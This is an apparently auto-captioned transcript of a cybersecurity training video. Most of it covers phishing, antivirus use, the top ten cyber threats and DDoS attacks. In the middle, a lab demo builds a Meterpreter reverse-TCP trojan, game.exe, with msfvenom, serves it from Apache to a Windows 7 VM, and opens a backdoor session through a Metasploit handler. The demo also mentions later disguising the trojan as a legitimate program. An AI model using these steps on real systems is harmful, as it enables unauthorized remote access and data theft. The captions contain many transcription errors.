And whatnot it was a ridiculous scheme i mean being chosen out of seven billion one out of seven billion um i mean our luck can’t be that good can it so you have to be wary about these attacks always ask the question if you want a lottery did you purchase the ticket no
So there’s never a free lunch right so always keep on questioning the things that you’ve been getting i’m not saying ignore them because some of them may actually come true there’s always that one percent hope but always investigate those things to see whether they are
Spam if there is a fraud going on and if yes you yourself can communicate with the law enforcement agency and try to figure out uh who is responsible for that fraud make use of antivirus software and always keep it updated again uh let’s not go for the free antivirus softwares because they
Have they may be good at detecting infections but when they come for the disinfecting those files then that’s where they ask for money and that’s when you’re going to run around and say okay let me see which is the which is a very good antivirus to
Disinfect this kind of a infection so uh there are a lot of antiviruses out there i know that and it’s very confusing which is the best one today now the problem is whichever is the best one in the market may not be the best one for the operating system that you’re using
For example i mean some uh there would be a good antivirus for windows 7 but the same antivirus installed on windows 8 or windows 10 wouldn’t be that effective so always do an investigation the best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see
The detection rate of that antivirus see how often does it detect the infections that you’re looking at what you can do is you can head on to a website called virustotal.com that’s v i r u s t o t a l dot com it’s a google
Owned website they have around 60 to 70 odd scanners on that website most of the known antivirus scanners are there try to figure out uh try to see if you can get hold of an infected file be very careful you don’t want to get infected yourself or i mean your computer you can
Upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses a few files a few infections over here and there and you will come to know which antiviruses would work for you use multi-factor authentication or two-step processes for authentication just don’t
Rely on a username and password registered devices get otps either on your email or on your devices and that gives you an added layer of security if your password gets compromised that’s still okay because now the hacker will need to simulate your phone as well so that’s added uh headaches and it may
Just not be worth it there are so many other people who don’t use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced and be very careful when you’re downloading apps now when we say applications on your mobile phones
As well as in your computers on your mobile phone you still have a certain level of security where you can go to the apple marketplace or whatever it is called the google marketplace or whatever it is called and they do have some level of control but when you talk
About windows operating systems and you’re going on to the open internet to look for different kinds of softwares you have no idea whether the website that you’re on is trustworthy or is hosted by a hacker with a malware on that particular file that you’re downloading especially if you’re downloading a pirated program never
Download a pirated program so be very careful when you’re downloading apps uh when you’re downloading an executable file you can upload it to virustotal.exe scan it to see if there are any viruses or malwares within it the website also helps you analyze urls to see if the url
Itself may have any malicious attacks within them embedded scripts or redirector scripts or things like that so you can use those that website uh to scan for scan the apps that you’re downloading and see if there is anything malicious about those apps moving on to cybercrime statistics now this is going
To be interesting let’s talk about how these things uh and the percentile of these things in today’s world by 2020 we would have generated 300 billion passwords now the human population on this planet is 7 billion imagine 7 billion having 300 billion passwords and i think half the population wouldn’t have access to
Computers or the internet either so imagine the number of passwords that we have and that’s what makes us use easy passwords makes us repeat those passwords and makes and we use a single password for multiple accounts right because there are just so many passwords that we have to remember but that’s the
Way it is and if we want to keep ourselves secure we are responsible for it so please be very careful with those passwords 24 000 malicious mobile apps blocked daily in fact the latest example that i can give give you i use an android phone and there’s an application
That i’ve always used called cam scanner and recently just three days back my mobile phone started telling me that it is a malicious app right i’ve been using it for years now probably three or four years maybe more what is the software you can click pictures of a document it
Will automatically convert it it will it will beautify it if that’s a word convert it into a pdf and i can then send it as an attachment via email a very handy app for me or was in handy app for me it worked beautifully but three days back suddenly
Uh the android operating system and my antivirus on my uh android phone started reporting it as a malicious software so i went online and i checked into it and it seemed that over a period of time the developers changed their vision of that software made it spyware and then there
Was a dropper involved within that application which would then download a malware from a third-party server install it and start spying on you and start showing you malicious advertisements right so this was an existing app which was trusted over a period of years and over a period of
Time slowly they modified it into a spyware kaspersky was an organization that detected it in the first place and then pointed it out to google google took it off the google play market and now there is a variant of it available but if you look at the reviews all of
Them are one stars where they have identified that there’s a malware now and it spies on them and it actually compromised some people’s data so that’s the latest example in 2017 or 18 there were 700 000 apps during that year that were identified by google as malicious
Apps and were deleted from google play so even if they’re published there will be thousands of people who will download it till the time google realizes that it is a malware and then they delete it till then you’ve already been compromised and there is no way to
Protect yourself now so be very careful when you download these applications in the healthcare sector ransomware attacks will quadruple now the healthcare sector is a very volatile sector it contains a lot of private and sensitive information health information about individuals that can be misused by a lot of organizations advertisements pharmaceutical organizations life
Insurance people and whatnot right so these become very lucrative targets for hackers where if they can steal the database and sell it on the black market they will earn a lot of money ransomwares would basically work the other way around they encrypt the data at the hospital side and then they will
Hold the hospital ransom to pay up now you know how hospitals earn nowadays right so that’s a lot of money that you’re looking at cyber crime would cost up to six trillion dollars in 2021 six trillion dollars just for cyber crime we are not talking about the income from
The iit industry we are talking about how much money we will lose to cyber crime because of the various attacks that we that would be created 90 of hackers use encryption not only encryption most of the advanced hackers will try to hide their identity by spoofing their ip addresses mac
Addresses locations they will use encryption and cryptography to hide their malicious softwares to fool the antiviruses idss ips’s and it would it is a very difficult task to even identify a particular malware analyze it and then do a root cause analysis and try to figure out who the responsible
Hacker was so it’s a very intensive task of doing such things and most of the hackers would go scot free because it is very difficult to identify them now let’s move on to the demo it’s a very interesting demo you’re using metasploit which is a penetration testing tool and
If you’re going to use a demo of using metasploit we’re going to try to compromise the security of a particular system well let’s discuss the demo before we start executing it so what we have done here is that we have two virtual machines on vmware workstation
One is the kali linux machine and the other is a windows 7 machine what we are going to do is we are going to use a penetration testing tool called metasploit which is available freely on kali linux and we are going to use a particular payload generator on
Metasploit called msfv venom and using msf venom we are going to create a back door a executable file which will contain a trojan or a backdoor and we’re going to try to infect that to the windows machine and see what happens when the victim executes that particular
File now we’re going to keep it at the basic level we’re just going to create the trojan and then we’re going to execute it in a later lecture or in a later video we’ll see how we can mask that trojan into a legitimate looking application so that a victim can be
Fooled by the application that we’re going to execute so let’s start with the demo all right so this is the kali linux vm and the other machine is a windows 7 virtual machine so what we’re going to do is on the kali linux machine we are
Going to just open up a command prompt right it’s just regular command prompt your regular commands and uh what we are going to do is we are going to use the msf venom uh payload generator from metasploit to create a game.exe file now the trojan is will be contained within
The game.exe so the command goes as such msf venom hyphen p for platform we want it or rather payload at this point in time we want the payload to be windows meetup reader reverse underscore tcp l host and the ip address for the localhost i’ll explain the command once
I’ve typed it let’s just check what our ip address for this machine is and we have 192.168.71.133 and that’s what we’re going to type in here 192 168 71.133 l port 4444 hyphen f exe hyphen a x 86 and we want that output in root desktop
And we want it as game.exe so let’s go through the command the msf venom is the initiator command it invokes the payload generator in metasploit hyphen p is the payload we want windows meterpreter reverse tcp so what is the reverse tcp here the meter reader allows us for
Remote code execution where we are going to create the payload we are going to execute the payload at the victims and and the payload will then generate a connection back to us us being the hacker’s machine and thus the local host which is the ip address of this machine which is the hacker’s
Machine that we’re using right now which is 192.168.71.133 that’s why we have typed in the local host and l port is the local port on which port do we want to listen in or we want the payload to connect to the local host so what we’re doing is the meter
Printer allows us remote code execution we create the game.exe we execute it at the victim’s end it is pre-coded to connect to a local host the ip address is coded over there to a particular port which in this case is 444. you can put in any port number you want just ensure
That the port is going to be free and it is not a regularly used port otherwise you’re going to get problems over there so at this point in time you’re going to keep it as 444. hyphen f stands for function we got an executable file hyphen a stands for the architecture
Here the architecture is 886 which is x86 which is 32-bit and we are going to export it and we are going to host it or we are going to create the file on root desktop and we are logged in as root as you can see at the prompt so when i
Press enter i should see a game.exe popping up right about here on my desktop if the command is correct which it should be and that’s game.exe wait for it to be compiled properly so there you can see platform windows for payload no encoder uh payload size 33 333 bytes
And final size of executable file is 73 800 and 00 802 bytes so now we have created game.exe now we are not going to convert this into or we are not going to merge this into a malware and things like that we are going to keep it simple
So to keep it simple what i’m going to do is as a hacker i’m going to host this on a server which is going to be on the same machine right so when we say we want to host an apache server the server is hosted in a directory called slash
Var bar slash www so let’s go there present working directory we can see that we are in root cd where w and then we are cd html and that is where our web servers would be so what we are going to do is we are going to create a directory mkdir
Shared right to an ls and you can see the shared folder right here ls hyphen al will give you the list and the attributes and we can see these attributes we want to change these attributes so we are going to use a chmod recursive command give the
Permissions as 755 to the folder shared since we are in the same directory we do not need to give the path for shared let’s just verify it and you can see the permissions being changed and now what we are going to do is we are going to
Change the ownership from root to www hyphen data for the web hosting so ch own for change ownership recursive www hyphen data colon www hyphen data to shared all right let’s check if that’s been done properly and you can see that earlier it was root root and now it is
Dub dub dub hyphen data www right and so that’s the directory that’s that we have created let’s go back uh what we want to do is we want to copy game.exe into this folder so cp root desktop game dot exe var dub dub dub html shared and cd shared let’s see
We have game.exe right there there it is and now what we want to do is service apache to start so essentially what we have done is we have created a directory in the html folder to host this file and we’ve copied it from our desktop into the
Shared folder and i’m going to pause here for a minute all right so uh we have started the service for the apache 2 server that means we have started the web server we have hosted the game.exe on the web server and the shared folder we have changed the permissions and the
Ownership for the shared folder now we are going to go on to the windows 7 machine and we are going to open up the browser and see if the web server is now accessible so if you remember the ip address of that machine was 192.168.71.133 and we have it we were in
The shared folder 92 168 71.133 shared and if this is done properly we should see the game.exe right here and once we click on it it’s going to ask us whether we want to save the file 72.1 kb we’re going to save it and i’m
Going to save it on i think it just saved it here and now before we execute it we are going to go back into kali line next and we are now going to start the listener right so we have created the exploit we have created the payload
Rather we have hosted it onto a web server which means that when somebody double clicks on it the machine is going to try to create a reverse connection to our hacker’s machine but our hacker’s machine needs to be configured to handle that incoming connection so we are going
To start off with msf console now msf console is the command which starts up metasploit right so we’re just going to take a minute over here you can see it’s metasploit framework control it’s going to start it’s does take a little bit of a while and
We’re just going to wait it out let me turn this into full screen i can see at the bottom left here on msf con on the msf prompt we are using metasploit with 1699 exploits now this is not a completely updated version the latest one would have around 1800 exploits but
The one that we want is uh exists in this version so there we are good to go so we start off with the configuration of metasploit to listen in on to that particular connection so we say use exploit multi handler and when you say multi multi is basically something that
Affects multiple operating system and we’re going to use that exploit you can see uh it’s now opening up the handler which we need to configure and here we’re going to set the payload that it is going to expect the payload being windows meter printer reverse underscore
Tcp you can see that the payload has been configured we are going to say show options and you’ll see it is going to ask us options for the payload which means the local host the listen address and the listing port and you can see we had by default
Given 444 which is the default port for this exploit within metasploit if you want to change if you have changed the port when you created game.exe you need to change the port over here as well and the commands here that says set lhost equals 192.168.71.133
Enter and i think i did a typo so uh there’s no equal to that’s it and you can see now it shows the equal to mark and we have now set the local host if we want to set the l port that’s how we do
It we had four 444 and there it is so if you have changed the port in the game.exe ensure that you change the port here as well show options and you’ll see now the data is populated over here lhost which is the localhost is 192.168.71
And l port the local port is 444. we have configured this and now what we are going to do is we are just going to type in exploit and now you can see that it has started the reverse tcp handler on 190 192.168.71.133 on port 444 so now when the victim which
Is windows 7 executes the file and we say run at the victim’s end there’s nothing that should happen uh it’s just uh resolving something and at the other end you can see that a meet of return station has been opened and it shows us that from the victim’s ip which is 71.129
On port 49493 we are connected to our machine so that’s that’s the connection that has happened press enter and you can see it exists exits the session let’s just look at the ip address on windows to confirm that was the same machine that we had and that’s 129
Right there it is uh let’s open up this file again and see what happens and you can see the second session being opened up right here to a pwd and you can see that we were connected to that particular website right so that’s what uh this
Trojans are supposed to do give us a backdoor entry and we then uh are able to connect and we are able to copy data and we are able to basically we have a back door so we can do anything and everything that we want to do
Just like how the code 19 situation is affecting various domains it is also adversely affecting cybersecurity interpol states that attackers are attacking computer networks and systems of businesses individuals and big global organizations due to the shift of focus to the covet crisis cyber security is taking a huge brunt
Even who has stated that from the beginning of this pandemic it has witnessed a sky-high increase in the number of cyber attacks there are fake emails doing the rounds in which scammers are impersonating w head show reports also state that the financial services sector is increasingly being targeted during the covet 19 coronavirus
Pandemic various banks and financial institutions have witnessed a spike in the number of cyber attacks in the last few months several banks are increasing cyber attack awareness amongst their customers and also asking them not to disclose any confidential information to a third party now that we have an idea as to how cyber
Attacks can affect us let’s go ahead and understand the meaning of a cyber threat a cyber threat is a warning which allows you to prepare against a cyber attack when there is an unauthorized access by a third party to your system and network it is termed as a cyber attack the
Person who carries this out is termed as a hacker or an attacker or a cyber criminal a possibility of such an attack is termed as a cyber threat as we saw previously cyber attacks lead to data breaches which result in either data manipulation or loss of highly confidential data
It also results in financial losses and which in turn has a colossal impact on the businesses in addition to these losses lot of companies face reputational damages as well trust plays a vital role when it comes to customer relationships cyber attacks can hamper an organization’s reputation and erode the customer’s trust
Let’s now get an understanding of the most common cyber attacks here we will look into the top 10 cyber threats in today’s times first up we have the malware attack this is a very common form of cyber attack the term malware refers to malicious software virus including spyware worms ransomware advair and trojans
Trojan virus is a form of malware that disguises itself as a legitimate software ransomware blocks access to the key components of the network whereas spyware as the name suggests is a software that steals your confidential data without your knowledge coming to adware it is also a software but this software displays advertising
Content such as banners or pop-ups on a user screen malware breaches a network through a vulnerability it usually happens when the victim clicks a dangerous link or downloads an email attachment or also when an infected pen drive is used let’s now have a look at the ways in
Which we can prevent a malware attack first and foremost you should use any kind of an antivirus software this step might be something that you have heard time and again but it is a very effective way to prevent a malware attack antivirus software is a program that can
Protect your computer against the above mentioned viruses this data security utility installed on a computer can prevent a malware attack few of the popular anti-virus software are a vast antivirus not an antivirus and mcafee antivirus secondly you should use firewalls a firewall helps prevent and unauthorize taxes viruses and other malicious
Activities that occur over the internet as the name suggests it acts as a wall between your system and the internet it filters a traffic that is allowed to enter your device windows and mac os 10 have their default built-in firewalls named as windows firewall and mac firewall respectively
Apart from this in order to prevent attacks on your network your router should also have a firewall built in Thirdly you should always stay alert and avoid clicking on suspicious links the links might look to be legitimate but they can be home to malware which is going to enter your system and cause a havoc lastly it is wise to update operating systems and browsers regularly if this
Is not done cyber criminals can exploit these vulnerabilities and attack your system that was all about preventing a malware attack let’s move on to the next attack it is the phishing attack it is one of the biggest widespread types of cyber attacks as per reports phishing accounts for over 12 billion
Dollars in business losses so what is a phishing attack it is an attack wherein an attacker impersonates to be a trusted contact and sends the victim fake emails unaware of this the victim opens the email and clicks on the malicious link or opens the attachment in the mail
The aim of such an attack is to gain access to confidential information and account credentials hackers can also install malware through a phishing attack this attack is growing bigger each day as attackers are becoming more convincing in pretending to be a trusted source for example you might get an email from
Apple stating that your apple account is kept on hold for security reasons and the mail will ask you to type in your login credentials in order to restore your account do not fall for that as it is a phishing email legitimate sources will not randomly send you mails and ask for your account
Credentials phishing is a type of social engineering attack social engineering attacks refer to several malicious activities that are obtained through human interactions it manipulates the victim in such a way that he or she ends up divulging personal information such an attack can happen on any platform such as text
Messages or even on social media sites similar to phishing you also have voice phishing known as wishing wishing will be carried out over a voice email or mobile phone or even over landlines so how do we prevent a phishing attack human error is the reason for a high
Percentage of cyber attacks to prevent a phishing attack the wisest way will be to scrutinize the emails you receive a phishing email will have some spelling mistakes or a format change from that of the legitimate source it is pretending to come from look for these loopholes and do not click any sub-suspicious emails
Next you can also make use of an anti-phishing toolbar sometimes when it is impossible to identify a phishing email this toolbar is helpful it has a tool that provides you with anti-phishing solutions and information about the website you are browsing they prevent fraudulent websites from masquerading as other legitimate
Websites for example avast online security is a good anti-fishing toolbar you can get you should also make it a habit to update your passwords regularly this way even if your own password is known to a third party it will still be invalid let’s now move on to the next type of
Cyber attack that is the password attack this is a form of attack most of us might have experienced at some point in time imagine when you try to log into an account and it says incorrect password in such a scenario it is possible that an outsider has managed to either guess
Or steal your password by doing so all your data is compromised a hacker can crack your password with the help of various programs and password tracking tools like aircrack can enable john ripper hashcat and so on there are different types of password attacks a brute force attack happens when the
Hacker tries to login with all possible password combinations meanwhile in the dictionary attack a list of common passwords is used to crack the user’s login credentials next is a keylogger attack keystroke logging records the keys struck on a keyboard by the victim and the victim is totally ignorant of this this keylogger
Or a keystroke recorder can either be a hardware or a software of how one can prevent password attacks it is crucial that you use alphanumeric passwords which are strong incorporate special characters in your passwords as well it is to be noted that you shouldn’t be using the same password for multiple
Websites or accounts also make sure to not use easily guessable passwords which includes your name or your family members names or even your date of birth needless to say update your passwords regularly this will limit your exposure to a password attack the next tip is something we should all
Be careful about often we make complicated passwords and to remember then we noted down somewhere or keep some sort of a password hint in the open this shouldn’t be done in the open as this can prove to be a gateway to an attack as a third party can misuse your
Account with the help of your password hint let’s now move on and have a look at the fourth type of cyber attack on our list that is the man in the middle attack as you can see on your screens we have the client on the left the server on the
Right and the hacker below and now you can see that the client server communication has been cut off and instead the communication line now goes through the hacker so let’s elaborate on this man in the middle attack is also known as eavesdropping attack it takes place when an attacker comes in between a
Two-party communication in other words the attacker hijacks the session between a client and host so what do they gain by interrupting the session well they are able to steal and also filter data imagine you are logging into your bank account in such a state a
Man in the middle attack can be used to obtain information related to your bank account let’s now have a look at how we can prevent man in the middle attack firstly you should be aware of the security of the website you are using and it is advised to use encryption on
All devices that contain crucial data using an unsecure public wi-fi can help attackers carry out the man in the middle attack hence it is suggested that you avoid using public wi-fi to carry out important work next attack that we will be talking about is the sql injection attack a structured query language sql
Injection occurs in a database driven website when the hacker manipulates a standard sql query this attack can be carried out by submitting a malicious code into a vulnerable website search box thereby making the server reveal information the outcome of this attack is that the attacker is able to view edit and delete
Tables in the databases in addition to this the attackers can also obtain administrator rights an sql attack manipulates data and accesses confidential information in order to prevent a sql injection attack you should use an intrusion detection system an ids is designed to detect unauthorized access to a system
It is used together with a firewall and a router this way unwanted requests can be filtered out the next step is to carry out a validation of the user supplied data there are codes that are developed to identify illegal user inputs the validation process helps in verifying
Whether or not the type of user input is allowed or not this way only that value which passes the validation will be processed that was all about the sql injection attack so now that we have reached midway i’d like to remind you all to feel free to
Leave your questions in our chat section and we will be happy to answer them without further ado let’s go back to our list of the top cyber security threats at number 6 we have the denial of service attack this is a type of attack that proves to
Be a major threat to companies in this attack malicious parties target systems servers or networks and then flood them with traffic so as to exhaust their resources and bandwidth as a result the server is unable to handle incoming requests and thereby resulting in the website it hosts to either slow down or shut
Down this leaves legitimate service requests unattended it is known as distributor denial of service ddos when attackers use multiple compromise systems to launch this attack like i mentioned earlier the ddos attack is a major threat to organizations let’s have a look at one such ddos attack in february 2018 the famous united
States-based global company github revealed that it was hit with the distributor denial of service attack ddos attack this ddos attack is considered to be the world’s largest edos attack as you might be aware github is a developer platform used by millions all over the world hence it always has high traffic and usage
But this time it wasn’t just high traffic but a whopping 1.35 terabits per second sending packets at a rate of 126.9 million per second these figures speak for itself fortunately github was running a ddos protection service which was automatically alerted within 10 minutes of the start of the attack
This attack only took github systems down for about 15 to 20 minutes github was able to stop the attack quickly only because it utilized the ddos mitigation service that helped in detecting the attack and which further helped in quickly taking the necessary steps to minimize the impact
Let’s now have a look at how to prevent a ddos attack firstly to stop a ddos attack you’re required to identify the malicious traffic this can be made possible by running a traffic analysis also remember to comprehend the warning signs few symptoms of a ddos attack include network slowdown intermittent website shutdowns etc
If anything seems irregular and unusual then the organization should do the needful secondly understand that every organization can face a ddos attack and be ready with a prevention plan as there won’t be any time to prepare one when it hits for this purpose develop an incident response plan have a checklist and make
Sure your team and data center is prepared if you are well prepared you can tackle a ddos attack smoothly like how github did lastly the conventional ddos mitigation solutions oversize the network bandwidth and require complex hardware which proves to be costly and also ineffective whereas cloud has greater bandwidth and resources
It is also to be noted that cloud-based apps can absorb malicious traffic way before it reaches its intended destination hence it is good to outsource ddos prevention to cloud-based service providers that was all about the ddos attack now let’s look at number seven and here we have the insider threat
And insider threat as the name suggests is one that does not involve a third party but an insider it could be someone from the organization who knows everything about the organization it could be current employees former employees contractors or even associates these threats have the potential to cause huge damages
Researchers show that insider threats are growing in small businesses as employees have access to multiple accounts that have a lot of data the individuals who misuse this data can put everyone else at risk reasons for such security breaches are many it can be due to malice greed or even carelessness
Such a threat is quite tricky as these attacks are hard to predict in order to prevent the insider threat attack thorough preparation is required organizations should make sure that they have a good culture of security awareness businesses can limit the i.t resources a user can have access to depending on
Their job rules this way the damage of cost can be minimized all the employees should be trained to identify insider threats and this way employees can understand when an attacker has manipulated or is attempting to misuse the company data next up in our list is crypto jacking which is at number eight
I’m sure most of you are aware of the word cryptocurrency cryptojacking is related to cryptocurrency you must be wondering how let’s understand what is cryptojacking crypto tracking takes place when attackers make their way into someone else’s computer to mine cryptocurrency this is done by infecting a website or
By manipulating the victim to click on a malicious link which in turn loads crypto mining code on the computer it is also done through online ads with javascript code that will auto execute once loader in the victim’s browser victims are unaware of this as the crypto mining court works in the background
The only sign they might witness is a delay in the execution crypto mining is a form of obtaining cryptocurrency crypto mining by itself is an immense process that is the reason attackers make use of other computers in order to cryptomine let’s have a look at ways to prevent
Crypto jacking it is advised that you keep all security apps and software updated to the latest versions as crypto jacking can infect the most unprotected systems it is also good to have a crypto tracking awareness training and give tips to employees as to how to detect crypto jacking threads make sure to
Inform them about the risks of opening emails from unknown senders and clicking on attachments ads are a primary source of crypto tracking scripts therefore it’s good to install an ad blocker and also have extensions like miner blog which is used to detect and block crypto mining scripts
Moving on to the number 9 on our list we have the zero day exploit a zero-day exploit occurs after the announcement of a network vulnerability usually the wenter becomes aware of a vulnerability but a solution to it is still not available for the scene hence the vendor announces the vulnerability
So that the users are aware of it but this also makes the attackers aware of it the vendor or the developer could take any amount of time to find a solution it could vary from a few hours to days to months depending on the vulnerability in the meantime the attackers target the
Disclose vulnerability they exploit the vulnerability even before a patch or a solution is implemented speaking of ways to prevent zero day exploit organizations should have a well-communicated patch management process it is also crucial to use management solutions to automate the procedures thus it avoids delays in deployment having an incident response plan helps
In dealing with a cyber attack you need to have a plan primarily looking into zero d attacks in case of an attack this plan will keep you prepared and will allow you to avoid or reduce the damage finally at number 10 we have the watering hole attack
Generally in a watering hole attack the victim is of a specific group it could be either victims of an organization or a region or so on here the attacker targets the websites which are frequently used by the particular group they identify these websites either by guesswork or by closely monitoring the group
After which the attackers infect a few of these websites with malware and anyone who happens to visit the infected website will have their computers automatically loaded with malware this attack loads the victim system with malware similar to the phishing attack the malware in such an attack targets personal information of the victim
There is also a possibility that the hacker will actively take control of the infected computer let’s have a look at how we can prevent the watering hole attack just like most other cyber attack prevention methods in this attack as well it is strongly suggested that you regularly update your software
By doing so you can reduce the risk of this attack as this attack most often exploits vulnerabilities also make sure to regularly check for any security patches make use of your network security tools to detect watering hole attacks intrusion prevention systems work finely when it comes to detecting a suspicious act
Similarly you can conduct regular security checks using various network security tools to prevent a watering hole attack it is good to conceal your online activities this can be done with the help of a vpn and also through your browser’s private browsing feature a virtual private network often called a
Vpn provides a secure connection to another network over the internet it acts as a cover to your browsing activity not vpn is an example of a vpn that can be used to provide a secure connection so those were all about the different types of cyber threats cyber security is implemented in order
To put a curve on these cyber attacks cyber security refers to the practice of protecting networks computer systems and their components from unauthorized digital access according to the gartner forecast worldwide it is stated that the worldwide spending on cyber security is forecasted to reach 133.7 billion dollars in 2022
And according to the university of maryland hackers attack every 39 seconds that is on an average 2244 times a day although we had a look at multiple methods to prevent a cyber attack let’s once again have a look at a few personal tips and ways in which you can prevent a
Cyber attack on the whole firstly it is important you change your passwords regularly and not only change but use strong passwords that are difficult to crack do not have extremely complicated passwords that you would tend to forget rather use a password with at least eight characters and preferably
Alphanumeric also keep in mind not to use the same password twice next update both the operating system and applications this will remove vulnerabilities that hackers tend to exploit make use of antivirus protection software as they prevent malware and other viruses from entering into your device use antivirus software from
Trusted and legitimate vendors only make sure to use a firewall as it will filter the traffic entering your device use other network security tools such as intrusion prevention systems access control application security and so on fourthly as mentioned in the earlier section don’t open emails from unknown centers scrutinize the emails that you
Receive and see where it comes from and if there are any grammatical or format errors ideally it is good to make use of a vpn by doing so the traffic is encrypted between the vpn server and your device this proves to be a protection for your device
The next step is that you regularly backup your data according to many security professionals it is good to have three copies of your data on two different types of media and one copy in an offsite location like a cloud storage this way even if you witness a cyber
Attack you can erase your systems and restore with a recently performed backup up next is that you should train your employees in cyber security principles they should also be aware of the various cyber threats and know how to tackle them in case of any emergency
The next one is a crucial step and that is to make sure to use two-factor or multi-factor authentication normally by logging in you would enter your user id and password but with two-factor authentication users are required to provide two different authentication factors to verify themselves it could be an additional
Personal identification code or maybe even a fingerprint when you are asked for more than two additional authentication methods apart from your username and password it is termed as a multi-factor authentication thus it proves to be a better step to secure your account make sure to always secure your wifi
Networks the next point is that refrain from using public wi-fi without using a virtual private network that is a vpn finally it is also necessary that you safeguard your mobile as mobiles are also a cyber attack target for this purpose install apps from only trusted and legitimate sources make sure
To keep your device updated and there you go those were few of the cyber security tips and ways to prevent a cyber attack let’s start off with a few interesting facts about ddos attacks cybercrime magazine stated that the total number of ddos attacks globally are anticipated to double to 14.5
Million by 2022. now that’s a huge number isn’t it also given the current situation with the kovit 19 pandemic every sector is operating virtually thus the attacks are growing more significantly than normal do you know the financial brunt of ddos attack causes once again according to cybercrime magazine a denial of service
Or a ddos attack could cost up to 120 000 dollars for a small company or more than 2 million dollars for a larger one with financial loss even reputation gets hampered there are a few industries that are more susceptible to ddos attacks and according to the cisco reports the
Online gaming and the gambling industry are a prime target now let me talk about a few real-life ddos attacks that have happened in the past our first example is the ddos attack faced by dime dine is an internet performance management and web application security company that was acquired by oracle in 2016.
On october 21st 2016 dine faced a serious distributor denial of service attacks that targeted systems operated by dns provider dime the dos attack lasted roughly for a day with spikes coming and going up to 1.5 terabits per second reports state that attack was carried out using a weapon called the mirai
Botnet about 10 to 20 percent of all the 500 000 or so known mirai bots were involved in addition to other devices the findings revealed that mirai was the primary source of malicious attack traffic the attack affected a large number of users in north america and europe several large businesses with high
Traffic like amazon quora airbnb hbo did new york times twitter visa and cnn were affected our next example is amazon web services a subsidiary of amazon which works on providing on-demand cloud computing platforms in the month of february 2020 amazon stated that aws shield observed and mitigated at 2.3 terabits per second
Ddos attack aws shield a managed edos protection service that is responsible for safeguarding applications running on aws mitigated this attack the attack was carried out using hijack cldub web servers and cost three days of elevated threat for its aw shield staff the ddos attack had a peak volume
Traffic of 2.3 terabits per second which is the largest ever recorded detailing the attack in its q1 2020 threat report amazon said its aws shield service mitigated the largest d-loss attack ever recorded stopping a 2.3 terabits per second attack in mid-february this year now that we have
Seen a few real life ddos attacks let’s move on to understanding what exactly a ddos attack is you might have often come across the word denial of service attack right so is it the same as ddos well they differ with respect to a few parameters a denial of service attack takes place
When a computer is used to flood the target server or network with traffic by doing so its resources and bandwidth are exhausted the motive of the attack is to deny normal legitimate service requests and user access as you can see in this image we have the attacker’s computer sending traffic to
The target server here now let’s speak a bit about the ddos attack a ddos attack works closely like a denial of service attack the only difference is that here multiple systems are used to launch the attack you can call dos attack as a large scale attack operation based on a denial of service
Attack ddos stands for distributed denial of service here several systems target a single system with malicious traffic when multiple systems are used the attacker can put the system offline more easily ddos attack is faster than a normal denial of service attack and ddos attacks are difficult to trace
From this image you can see that multiple systems are used to launch this attack the systems together flood the target system with massive traffic now that we know what a ddos attack is let’s try and understand the motive behind these attacks the first reason can be guessed well by
All of you and that is for ransom just like any other cyber attack the primary reason is monetary gain a website owner can be asked to pay a ransom for attackers to stop a ddos attack the ransom prices to stop the ddos attacks vary from small amounts to hefty
Amounts of money in most cases the ransom is usually charged in bitcoins the second reason is hacktivism or protest hacktivism occurs with the intention of spreading a message the aim of this is to usually protest against an ideology of a political agenda the target of many hacktivists and ddos
Attacks are government financial or business websites attackers launch ddos attacks to shut a website say for a political reason thus trying to make a statement a person with a financial or an ideological motive is capable to damage an organization by launching a ddos attack against it lastly these attacks can be carried out
For a specific reason called targeted attacks for example it can be done to damage an organization’s reputation it is to be noted that ddos attacks can be deployed against big or small sites and can be driven by either competition or pure boredom or also for the need for challenge
The magnitude of these attacks can vary from small to big let’s now move on and understand a little more about the working of a ddos attack an attacker is required to gain control of a network of online machines in order to carry out a ddos attack computers and various other iot devices
Are infected with malware and these turn into a port also known as a zombie a group of such bots is called a botnet once a botnet is created the attacker takes over the remote control access a ddos is usually launched through a network of remotely controlled bots or
Hacked computers botnets can range from hundreds to thousands of computers controlled by hackers it is possible that your computer could be a part of a botnet without even you knowing it the next step is to target the ip address of the victim by the botnet once this is done each bot will bombard
Their target with fake service requests the botnets send more connection requests than a server can handle in some cases they send huge volumes of data that exceed the bandwidth range of the victim by doing so the targeted server or network will overflow and thus resulting in a denial of service to normal traffic
It is not possible to identify the bot as it looks like a legitimate internet device a successful ddos attack slows a website prevents users from accessing it resulting in financial losses and performance issues so now that you know how a ddos attack is carried out let’s have a look at the
Types of ddos attacks different ddos attack vectors target the different components of a network connection ddos attacks can be divided into three types they are volume based attacks protocol attacks and application layer attacks let’s have a look at each one of these attacks first up we have the volume based ddos
Attack as the name suggests this attack depends on the volume of the inbound traffic to the target this attack aims at overloading the website’s bandwidth or causes usage issues it creates a congestion by consuming all the available bandwidth here massive volumes of data are sent to the victim
By using a form of an application or request from a botnet it is very simple the more the volume the higher the success rate of the attack the volume-based dos attacks include udp floods pink that is icmp floods and other spoofed packet floods now let’s have a look at an example of
The volume based attack that is the ping icmp flood attack the internet control message protocol icmp which is utilized in a pink flood attack is an internet layer protocol used by network devices to communicate an icmp flood attack also known as ping flood attack is one of the most common
Denial of service attacks here the attacker overwhelms the target device with icmp eco requests basically icmp eco request and eco reply messages are used to ping a network device to check the connection between the sender and the receiver an icmp request requires resources and bandwidth to process and reply to the requests
By flooding the target with request packets the network is forced to respond with an equal number of reply packets thus making it unserviceable to normal traffic attackers would usually spoof in a bogus ip address in order to mask the sending device the next type of ddos attack we will be
Discussing about is the protocol based attack when you learn networking you will know that the internet is based totally on a set of protocols protocol attacks cause a service disruption by consuming intermediate communication equipment like firewalls and load balancers ddos attacks based on protocols exploit weaknesses in layer 3 and layer 4
Protocol stacks protocol based attacks exploit your network by sending either more packets than what your server can manage or more bandwidth than what your network ports can hold this attack includes sim floods ping of death and smurf ddos to name a few here we will have a look at an example
Of the protocol based attack that is the syn flood attack here the attack exploits the tcp handshake in a regular tcp network transaction there is a three-way handshake namely the sin the acknowledgement and the sin acknowledgement the sin is a service request the act that is also known as the
Acknowledgement is the response from the target and the same acknowledgement is the original requester replying with something like a thanks in return whereas in the sin flood attack the syn packets are created with fake ip addresses by the attackers the target as per the protocol then sends an acknowledgement to the dummy address
